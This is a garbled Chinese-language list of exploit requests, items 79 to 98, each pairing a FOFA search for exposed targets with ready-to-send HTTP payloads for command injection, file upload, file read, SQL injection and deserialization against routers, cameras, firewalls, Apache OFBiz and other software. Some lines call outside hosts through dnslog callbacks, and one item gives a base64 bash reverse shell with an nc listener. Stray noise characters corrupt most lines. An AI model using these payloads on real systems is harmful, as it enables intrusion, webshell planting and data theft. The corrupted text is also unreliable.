) g4 G7 j2 ]+ p& M# @------YsOxWxSvj1KyZow1PTsh98fdu6l--+ T6 d' \" \. V6 n8 H! {6 M; q2 z* t
6 M! T& |" N, |1 i
9 t4 x$ Y, n9 v& DGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
% g( [; ~1 V& T" LHost: x.x.x.x
: ^( z& ?' v+ f1 x* J: B# b- S* C1 \' y
% G. g5 L+ L* \7 G, R# [
79. BYTEVALUE 百为流控路由器远程命令执行
H x: ~& \8 s7 cFOFA:BYTEVALUE 智能流控路由器
; N# W9 o `& k" @9 M/ w% m) KGET /goform/webRead/open/?path=|id HTTP/1.1# h- ~+ t1 d8 [# e
Host:IP
0 |/ u7 n- B; u7 z- OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
: f# ~: h, D( ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 V$ p! ~- M& _8 _3 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' {* N, T. @6 i% L3 D- o9 E }Accept-Encoding: gzip, deflate8 o' I3 Z/ A) S2 R! k4 E' X, B
Connection: close3 y+ C! k7 }9 z9 A2 q& p
Upgrade-Insecure-Requests: 19 U2 p- `' ~. B! P1 i& }
3 X% x) M. \* A- {. Z/ S& M0 }
. g' v3 h D* T( A: t/ P4 u$ K80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 | y* f; k; I. E( l4 O2 Z! W y
FOFA:app="速达软件-公司产品"
, `" _% z- ^% ^6 NPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1; R" Q+ G" u) X% R& K
Host: x.x.x.x
6 j% v+ k- T, Q, P! nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ R& `* V- a5 h3 ~/ `' E$ e
Content-Length: 270 b, w: w, ^. n; `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 f, d1 D; a2 c, eAccept-Encoding: gzip, deflate7 F; s2 K4 N/ D: m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 x3 w) F7 _4 B) Z3 qConnection: close
. ^- C' ~; Z, \* b) {Content-Type: application/octet-stream
% K. s* ]# t# ~; v$ qUpgrade-Insecure-Requests: 1+ R' \5 Y, j$ \0 q0 l' `
2 c6 H! f' |' @2 V S' m1 D8 [<% out.print("oessqeonylzaf");%>
1 C3 x/ f5 n& L) z; z0 F+ V7 e/ O2 s" f! K2 t4 }
[* w& m2 @# h" P" GGET /xykqmfxpoas.jsp HTTP/1.1
2 j' Q( K; u7 |( lHost: x.x.x.x
4 E2 Q7 Q3 D/ n% ?' e; DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( V) L1 V. g' @9 t- c
Connection: close( c0 h1 @+ v7 ~
Accept-Encoding: gzip0 a) w G: r1 C8 o
7 T L6 r: w S% u7 C9 g' Y* Z& T- K2 n# D# S$ \% q
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: S- }$ A1 }% z1 I2 |FOFA:app="uniview-视频监控"; I$ a3 R+ Q5 q# b0 G1 b$ E
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 @1 }- L8 g3 O2 E0 N, [# DHost: x.x.x.x8 s6 e2 E9 s5 m1 W; j# ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 s- e; ?% Z7 @- Z6 ^Connection: close2 e+ o) |* K0 G: [
Accept-Encoding: gzip) u- K% e. f' H/ i; L& X) ^" q
( X2 p5 U' j* \& O: l, w
$ k8 D* q! d" X
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行( y5 R+ I" k7 T* d
FOFA:app="思福迪-LOGBASE"
1 i8 P" a. b4 v( UPOST /bhost/test_qrcode_b HTTP/1.1
+ ^" J5 b( P) c# ], JHost: BaseURL: l1 u2 x7 m9 f4 i6 D" U
User-Agent: Go-http-client/1.11 T3 l. x1 i s. l. C/ h
Content-Length: 237 C8 h6 ?' z, B# H* r
Accept-Encoding: gzip0 `" }& S, k, ]4 w' ^0 p6 f* ?
Connection: close
s& N/ W9 n; pContent-Type: application/x-www-form-urlencoded
* U/ i( m0 u" k% n& ~4 l0 rReferer: BaseURL. A/ e/ w- o! z# Z' P- a
: L# r! \0 ^3 V/ A
z1=1&z2="|id;"&z3=bhost
\* i0 Z) |6 Z
- f1 l+ Y) X; v$ O4 ^5 g$ D6 U) e6 B
+ N1 U" h$ w# x) y83. JeecgBoot testConnection 远程命令执行
# P$ D) {8 z9 P0 z6 ^FOFA:title=="JeecgBoot 企业级低代码平台"( A M2 Y1 f! B
- }' U; J1 F% e$ q2 s+ Q
s7 N6 v9 J8 x4 ]7 `* b4 C% L' y
POST /jmreport/testConnection HTTP/1.1
$ t" y8 h% V3 C' tHost: x.x.x.x/ F5 q' p0 w/ o4 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 }4 C# j+ l d1 T0 uConnection: close' g+ ]* ], M! w. M
Content-Length: 8881! ^" Q+ }2 D3 i& Z) f! q3 W2 V7 q! L
Accept-Encoding: gzip3 _6 }* O- B! L- _7 A
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
" S- X8 i/ G$ l9 W/ UContent-Type: application/json4 O. z# m+ ?% n' T7 i
* T0 {- r$ q2 H& W' x
PAYLOAD, S9 {: ]0 C+ \: i5 a% e( ]# M3 n* y* I
* y) y# [( X& i4 e
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! g& k6 v' e: W9 \5 F3 `
FOFA:title=="JeecgBoot 企业级低代码平台"- u& M* B9 ^- [
! b7 j0 @1 j$ ]8 k3 y( b5 W9 Q
% G1 ^* U# Z1 m
1 b8 K) ^# x/ `( m) C- b* @# rPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
/ u8 V3 _, h$ o* h7 Q `% P1 [Host: 192.168.40.130:8080
0 L6 P0 C1 o& c* VUser-Agent: curl/7.88.1' L+ G) {: N; X! m- Y
Content-Length: 156
: w" r/ Q% y5 l9 q# g" C& cAccept: */*1 g5 _3 ` I/ u/ D
Connection: close
_( v9 ?2 x2 W9 R3 s0 n+ ]Content-Type: application/json
! X" G( X* h9 j% r) yAccept-Encoding: gzip
% ]( d# l% K$ p7 {% o& N) [+ f& @6 L( w
{2 ]) \& M: Q/ }
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 X$ i$ v5 q" P; Y) |
"type": "0"
' L1 W5 I( I! a$ X}0 F9 E( @1 x- K2 S0 R8 h# M
- |" F( A& ]* u. q9 O2 [
$ [9 F- Q) p- ?# a
85. SysAid On-premise< 23.3.36远程代码执行
# @: L* B! ^" A% m3 ?# kCVE-2023-47246* r! i4 ^1 z7 e4 n( ^
FOFA:body="sysaid-logo-dark-green.png" 7 R+ `1 }. W7 \' k- @. R L4 f
EXP数据包如下,注入哥斯拉马. u: ~$ u( g2 w! B: q( O
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.18 Q6 a% |4 J) |+ Q J5 N
Host: x.x.x.x+ N+ J! l8 x4 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 D2 L1 F1 f' B! q; J f* K! Z
Content-Type: application/octet-stream) Y5 s$ N1 V' x4 n' I' y
Accept-Encoding: gzip9 ^+ ]5 q$ K$ |0 }' m, E% i
: K" K9 ^3 `, s& m* C; b6 ?. K
PAYLOAD
$ ^, w7 W+ x) V" c" F; _6 g3 X9 { i4 J
回显URL:http://x.x.x.x/userfiles/index.jsp* T% R6 J. g! n* e/ s
0 m9 T& T6 C: e8 b1 n0 {
86. 日本tosei自助洗衣机RCE+ t4 h! g% _6 G: {$ h c: H9 L5 u
FOFA:body="tosei_login_check.php"
( i7 G! P% S+ V0 A5 I+ ?POST /cgi-bin/network_test.php HTTP/1.1
_( H- ]. }1 v0 ~Host: x.x.x.x
2 K% o0 t t0 `! K/ F) nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
5 c" j: R/ ?, }0 ^& uConnection: close
2 }- Z. \9 q# U/ ~Content-Length: 44
9 }* J' _% Z+ L" x! V0 B' J L' dAccept: */*( I) z# F) k6 A4 T8 v
Accept-Encoding: gzip
, X: \5 p0 c1 e$ D5 eAccept-Language: en6 Y$ r0 h- K* Z0 S2 Q( B' N2 `8 a
Content-Type: application/x-www-form-urlencoded) s8 F, Q* z: d% c* r L. O2 y0 A3 m
7 h( T3 R" w# g" ~0 ]( z. n: \
host=%0acat${IFS}/etc/passwd%0a&command=ping" j/ q) `7 u N
. v" j2 F* ? f# H# C5 J2 |* L5 t' J" ~
87. 安恒明御安全网关aaa_local_web_preview文件上传1 Y: D' N2 j2 x2 M8 C3 z
FOFA:title="明御安全网关"4 q. T. Y' q A! L
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
: A. ]. c4 s( d8 p6 i3 C, kHost: X.X.X.X
! d7 j8 n% X1 u5 ]. D- _: eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 `& a. ?! E O" n7 z
Connection: close ?0 U, c; K$ s% d
Content-Length: 198
- W; Y3 ]* ~) ~- W% x5 s* fAccept-Encoding: gzip
6 C+ v1 n: K. ^. xContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
+ r8 w5 e ]7 n0 x3 b
' Y6 u+ r/ n9 Q--qqobiandqgawlxodfiisporjwravxtvd
3 M. }8 d) @, ^3 Z& p! a# y; o' sContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
; O' j6 y0 |- f1 u: aContent-Type: text/plain1 e# x0 O. d6 L
6 c3 r* T- f1 f/ p1 X N1 m
2ZqGNnsjzzU2GBBPyd8AIA7QlDq3 V/ }' ?& ^: O7 C4 h* ~+ L* q4 W, @
--qqobiandqgawlxodfiisporjwravxtvd--
$ M, q7 e+ p. P' ?) |- Y% G
" @! ?7 `% g" m4 U2 {% E+ n2 H y* g7 I" E+ a
/jfhatuwe.php
2 r! Y) z- A- l3 ~( J
1 Q0 n& E4 @& R* g0 r: D# I88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 E# C, u5 `8 j5 P; K9 T$ ^& e+ GFOFA:title="明御安全网关"5 J* K* }7 }3 d! p
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
, V* J. A! t- ]* s/ {; `5 b$ OHost: x.x.x.xx.x.x.x
+ r% `6 l4 S2 \- \0 d# U' ~6 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ Y' E( w# j- A% ~' u( c" i5 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' L }; }6 N: r, V& {8 X
Accept-Encoding: gzip, deflate1 w0 ?4 ~( K& S/ |% h; X+ B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) M7 W0 U7 ]# r6 X# P: E0 v. bConnection: close" x; u) m; `, P; ^
' G z% I2 @4 n
, g, A' u0 l$ i/astdfkhl.php! C0 Z. {. G1 @
' S: ^) |9 i9 \2 {. C5 T! y89. 致远互联FE协作办公平台editflow_manager存在sql注入
3 L; x8 W% T$ q( P, Q' xFOFA:title="FE协作办公平台" || body="li_plugins_download"
# u, r9 C4 W" t+ p3 @+ l2 tPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
3 P% i# E ~/ {: U0 e; h8 F5 A2 tHost: x.x.x.x* T4 l1 c5 v6 d3 m K C5 q2 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! |8 \ k! l6 U) o) NConnection: close
$ e# v# y, r8 R$ e, k( _6 JContent-Length: 41: u% t+ D6 C5 M$ `. x8 w
Content-Type: application/x-www-form-urlencoded
7 r/ o6 j# E% F$ T; sAccept-Encoding: gzip1 h( @1 F; ?% a
0 ^/ U ~) G# n0 T6 Q& poption=2&GUID=-1'+union+select+111*222--+7 q$ e- y# ]8 ~) i9 B+ }( \1 z
3 W4 m7 D8 i5 b$ _- s/ w( J7 m
3 G S+ t6 h- @( {; L90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行: @: d' a- G% U$ X
FOFA:icon_hash="-1830859634") j8 S1 y* [$ R
POST /php/ping.php HTTP/1.1) D; X' i0 G% ^+ ~) F+ X1 c8 F6 g3 ^
Host: x.x.x.x
) ]( k5 o P( a- W' I, |! K. nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 v6 U' V9 J' R# T. R; [6 ^& X! r
Content-Length: 51
; l. b% b) C3 g- }" \( z- c. rAccept: application/json, text/javascript, */*; q=0.01
& \- Q N+ {: C, c1 {Accept-Encoding: gzip, deflate
1 B6 M9 D9 ~( j$ ^" s$ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 s/ A. a( o* g) x+ BConnection: close: }& E0 w6 V, i
Content-Type: application/x-www-form-urlencoded
: W7 y4 S- J, u* ]' Z4 LX-Requested-With: XMLHttpRequest
. A+ ~1 G2 r# s3 n5 n( s* @0 X- k+ r6 h2 J$ Z9 c! \3 p- R/ N
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
6 q7 `( O. [ W0 J. ~& e
- I# H& j( ?) _5 d% ?# q
: C9 l+ G( a) {$ p# Z91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取( { \4 W% K7 D8 Q
FOFA:title="综合安防管理平台"0 l c# g% S# o
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
( M8 f' v0 `# R. s/ ?8 I3 ?Host: your-ip
4 ]2 w4 e5 X6 W- MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& e+ S% o2 w3 o/ ?
Accept-Encoding: gzip, deflate
. w4 g& e4 A9 d% Q% ~' eAccept: */*
" v0 ]; `1 E" g% o) I" _Connection: keep-alive
" w: I0 k# h( {; |% V/ X
2 ~( M `6 c2 W8 E a% k7 S2 d6 F9 T0 ]; x6 E8 [3 O8 R, i
3 U7 T; R1 }2 u( O6 T7 n1 Z' Y3 p
92. 海康威视运行管理中心session命令执行
+ n. _* d" Q: FFastjson命令执行
' V2 d( F$ @' h6 c/ p- ?$ Shunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
" J H- y9 M! H2 BPOST /center/api/session HTTP/1.1
3 ^ |# F R1 THost:$ `) |, @/ \2 w) J# S: n" R0 d
Accept: application/json, text/plain, */*
2 N7 E# u2 s: e7 l- }Accept-Encoding: gzip, deflate- A# q* Y- N8 k& {4 ^; j# ~" o
X-Requested-With: XMLHttpRequest
8 t/ L$ ~+ h Q: s$ ]9 ]Content-Type: application/json;charset=UTF-8* f3 q3 B2 c; u |5 G C! K
X-Language-Type: zh_CN
8 J: a5 n, Y1 b2 b2 ^+ uTestcmd: echo test+ B+ C* f: e0 X& l/ S9 G% L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.361 S6 n' V- r, W. z% u$ T* K4 J7 L" E
Accept-Language: zh-CN,zh;q=0.9# d, k9 w. R( G. e; a$ r9 k9 R) N- X
Content-Length: 5778
- `) x6 A) Z7 M
, G6 M5 i( Q" M' IPAYLOAD: |; N9 F' o2 B, g
( Z. V4 W5 b) I: `- Y6 v
4 v0 z: o6 N- Z. j( l) ?" Q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传* V( S* L( T' K% W# v- u& W6 U
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 K/ R* g8 }) z/ wPOST /?g=app_av_import_save HTTP/1.1
1 s# K y4 G" GHost: x.x.x.x- q; |% Q1 _7 Y. F* k, }) x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx* |) ?. b: U) c0 p( U) k5 K) ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ K/ V8 v5 Z) {. J8 B; b T; C2 b0 r3 S I
------WebKitFormBoundarykcbkgdfx
+ a: l6 r. h+ O0 `1 N) ~Content-Disposition: form-data; name="MAX_FILE_SIZE"
$ a' A4 j# m0 m5 n m1 j
( ]2 C* q1 a a10000000
! k3 v v& A0 ]' ?8 x------WebKitFormBoundarykcbkgdfx) ?( W0 ~1 s" T0 K
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"" A3 t) R, v9 X2 P
Content-Type: text/plain
& `8 D- r' Q+ z) J+ y( {$ ?6 V* [- D+ f7 W: d5 I
wagletqrkwrddkthtulxsqrphulnknxa
" O) X1 E* j% y ]$ l------WebKitFormBoundarykcbkgdfx/ v' Z9 |" d/ D0 s
Content-Disposition: form-data; name="submit_post"
- n# i: w& o0 b& Q
9 M7 {' t% G; \% P+ X# ~+ P5 Hobj_app_upfile
+ ^0 h) A5 V* C2 ^2 f: }------WebKitFormBoundarykcbkgdfx
5 W' Q8 i5 q5 p& H4 ~; F8 JContent-Disposition: form-data; name="__hash__". R' s6 p8 o) t4 r% S+ c; V
0 `7 e9 x" f6 G! g* c3 \0b9d6b1ab7479ab69d9f71b05e0e94455 R( `6 t- v1 `4 D `
------WebKitFormBoundarykcbkgdfx--* V" x" r& B. h5 y6 ~- x9 a
& W( K1 j# _' v1 O: ]( O& [; ^) b
( F2 y/ C$ D, h: C) O( A
GET /attachements/xlskxknxa.txt HTTP/1.1
: K: _2 n7 I4 T5 N" N! mHost: xx.xx.xx.xx$ W) z, K' v. w8 l+ ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
A& o6 E. B3 c, X5 |
& H' K$ q T J+ w J4 W3 t' e) ]( _0 W
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
4 L8 L- ?, B) V- O8 [, L0 B" kFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="! T! T0 N* V @: K! ?, O6 |
POST /?g=obj_area_import_save HTTP/1.10 @( {/ V( N; @
Host: x.x.x.x! J- J5 q$ G, Z; W4 X7 h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt6 r- Z. U, H! t; I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, A. o" {2 `9 ^' ]7 U4 C" _1 z5 w4 h5 C
------WebKitFormBoundarybqvzqvmt
, d0 w5 r, ~0 E- b( q# ]' `; } V pContent-Disposition: form-data; name="MAX_FILE_SIZE"
5 b$ X+ w/ {# Y# x7 b5 A8 C: E) X
7 ^, E6 o, x M! B( u100000008 @, o7 {( g$ A$ C" _" [
------WebKitFormBoundarybqvzqvmt# I2 `) a/ @" r) c# f
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"( r6 S4 S" {" H; p/ x7 {0 ]0 h
Content-Type: text/plain
7 i& U R1 H0 } e# v; H: I: n+ R; g, U# [
pxplitttsrjnyoafavcajwkvhxindhmu. K4 k9 H6 H1 k! H, X5 o; E a6 A
------WebKitFormBoundarybqvzqvmt) o6 s* j5 a0 a$ K8 v# V
Content-Disposition: form-data; name="submit_post"
* F/ s1 B4 e& ^9 p, B8 N
- A W x. @) Y- O, o' x0 [obj_app_upfile$ h. p d9 w# v- A% i6 A! e. m
------WebKitFormBoundarybqvzqvmt2 w% S; |9 F% Y* z8 M; `6 w1 I0 i* W
Content-Disposition: form-data; name="__hash__"
; E4 Y6 ?6 ]) e# v6 ?! W
1 l* f: \ k1 c9 g7 ^0b9d6b1ab7479ab69d9f71b05e0e9445 e. N1 K4 X6 P: G8 s2 v; s5 k
------WebKitFormBoundarybqvzqvmt--" T+ h" B% m! E7 i; |
& ?. f! }" X% v) p* b$ @: m! `4 k: t, c1 F
9 U E) Q2 U% h# LGET /attachements/xlskxknxa.txt HTTP/1.1
1 t6 J) y/ F. Z9 A; B! }. |Host: xx.xx.xx.xx
4 o A; n: n9 f% s/ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( @/ p2 w9 H5 u' [
0 B& H# W$ {5 t) d
1 I9 {" z1 V# c; d( h
1 u8 [ Y5 p" k. ?5 o) p95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
3 b7 q4 A4 o# [7 @" E( o% W' @CVE-2023-49070
" O, v3 j6 L: a4 KFOFA:app="Apache_OFBiz"
3 w3 \, Z$ |9 hPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 ^& U' ^. ?6 D8 P
Host: x.x.x.x
5 f/ k! A, l$ J* Y$ h# t0 [) jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" z; r1 q, F& f5 q2 ~ [Connection: close0 E% s' U6 e- y( Z s
Content-Length: 889
8 H1 j+ p& |' n( j- [Content-Type: application/xml
m* ]) i/ D& M6 q+ zAccept-Encoding: gzip0 P+ U- r* x5 s
: `6 R: V# t4 j* f* C2 y( y<?xml version="1.0"?>
% A2 O5 i0 {2 F- P, m<methodCall>: {% P9 s; c: O7 j, L. n2 L
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
4 H! q6 m' }& x: _/ P! |& [ <params>
% _, V1 V! m) o' d+ ?2 C <param>
- N$ N% M3 q0 h+ s" p5 @4 s <value>& B5 \! P/ f. K
<struct>! [* @7 ~4 G7 Q3 |
<member>
9 f4 H1 b- u' [/ U) C5 x <name>test</name># h$ V' B( P+ D( v# {
<value>
- P: W* ?2 I- c. O <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
2 d; _) H' E ]7 U* }" S </value>( c4 `" C) @+ H( C* U) F( I
</member>; x$ j; W- I& j; J
</struct>
6 O5 H+ d9 `# K; T, r </value>
# {5 B& X2 M1 _" \; x+ m) M </param>4 d! c/ l5 V, h" Q- X
</params>
+ l( V' n8 J( M; l8 D% N o</methodCall>: p( J' Z' Z. u; E
$ `9 D& l! d9 B3 ~7 h7 e7 q
; s$ q m" e4 G
用ysoserial生成payload H3 F* x7 z) X8 F' o2 i, [3 l) G) ^
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"2 B7 a3 W6 s( u: Q6 A( n8 \
$ g- B% a2 K' x7 a$ E N) _& H
7 J& K0 l; C& V
将生成的payload替换到上面的POC
0 f5 p. h/ o, f$ ^POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% J# U/ ^- e+ C4 U
Host: 192.168.40.130:8443. H! |2 c2 ~7 C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 d8 I: m3 p2 J/ |0 R
Connection: close: G0 E Z3 y5 e( r) A
Content-Length: 889/ u( D( b1 u- j# i. M7 m5 L
Content-Type: application/xml
; _% ^5 W9 m2 h3 WAccept-Encoding: gzip7 P0 o6 [( Q. m }
+ |6 T; h% D' K/ w7 p& N
PAYLOAD) x0 @+ ^9 y% j2 S
5 |- ` L8 j2 u. D+ B) R) R
96. Apache OFBiz 18.12.11 groovy 远程代码执行 k- H' v4 y3 K+ i
FOFA:app="Apache_OFBiz"& F# O" {% q- F, r
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
6 H G( s0 R. ]; DHost: localhost:8443
G& Z3 L" [; s9 l3 E; hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" B9 h3 {+ v8 {) l* _: pAccept: */*
$ {0 }5 F' g. O; L* _2 O5 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 O5 D$ q' F8 h! o6 a& fContent-Type: application/x-www-form-urlencoded0 D% L, n2 {" H/ b- t
Content-Length: 55- R0 i) T0 O+ c S
7 Y7 a* v: G$ L
groovyProgram=throw+new+Exception('id'.execute().text);7 C7 {- i* U7 Y6 U7 Z
6 H: n" B M1 s/ ^% C+ e9 G
% E4 E, _& f8 U5 |8 a) C' |) T反弹shell
. c! V4 o4 g& ?- d2 E) D7 K在kali上启动一个监听' r3 m1 g& A; q h$ X' j
nc -lvp 77777 m. c- D: E( f8 O3 {
/ f& o5 a$ u+ P) H. u- m' m8 k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1, [; d$ I/ p" w# L% x
Host: 192.168.40.130:8443) `: r9 D C5 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 M" k7 ?& V" w5 `, |; Z# b
Accept: */*: N' u7 |; }8 T9 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 Y8 Q8 ^% S' KContent-Type: application/x-www-form-urlencoded
; q& d: \- p8 s) v2 H `Content-Length: 71' F3 ^2 S5 R! B9 H) f
I! ?7 |) r, W( U8 _2 t" W
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 u" r2 J2 B7 g# t# H. ]
1 f- [+ c2 v' H- P& p97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
& Z7 i5 k9 G- C5 TFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"- W6 j1 B) O2 P6 F5 M* [! e x
GET /passport/login/ HTTP/1.1
- w8 I( D$ Q } ^# s7 P9 }$ fHost: 192.168.40.130:8085: F& d9 H% m' c8 j' p, [* w6 X' x0 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- }* m7 D8 h; K8 M0 Z& N
Accept-Encoding: gzip
5 S' `& I( ~+ K1 o7 lConnection: close
4 |# @' ?" c4 r' OCookie: rememberMe=PAYLOAD, P+ S( q' ?, W! k
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"0 [4 A* a0 V4 C7 W: d3 d! P3 x" T
# U9 B5 `) d B( S5 o' c
; m. s( W6 N" P3 s7 @# I0 x- l98. SpiderFlow爬虫平台远程命令执行
0 _2 b( L" m' p3 A# A! q# e9 RCVE-2024-0195
( [* g7 f( `% X, GFOFA:app="SpiderFlow"% L* K- g) E% Y1 _% {
POST /function/save HTTP/1.1! K3 ]# w% J) k
Host: 192.168.40.130:8088+ a) }& ^9 u0 u' n0 I& E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# M7 N, S# O+ X f# R3 h: \% r
Connection: close
" w4 B0 C; R% K2 V2 zContent-Length: 1210 T/ f8 a2 K) F/ d- y0 Q
Accept: */*
i& Q1 ?" T: W0 C/ z; O+ @Accept-Encoding: gzip, deflate# F/ x; n* S4 e( h7 Y5 M, V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 C$ \+ u5 l3 t# `3 bContent-Type: application/x-www-form-urlencoded; charset=UTF-8
" @+ o8 }% O/ e* b8 E7 T9 ?0 ?- @X-Requested-With: XMLHttpRequest6 Z- ~+ W u4 V. G3 i
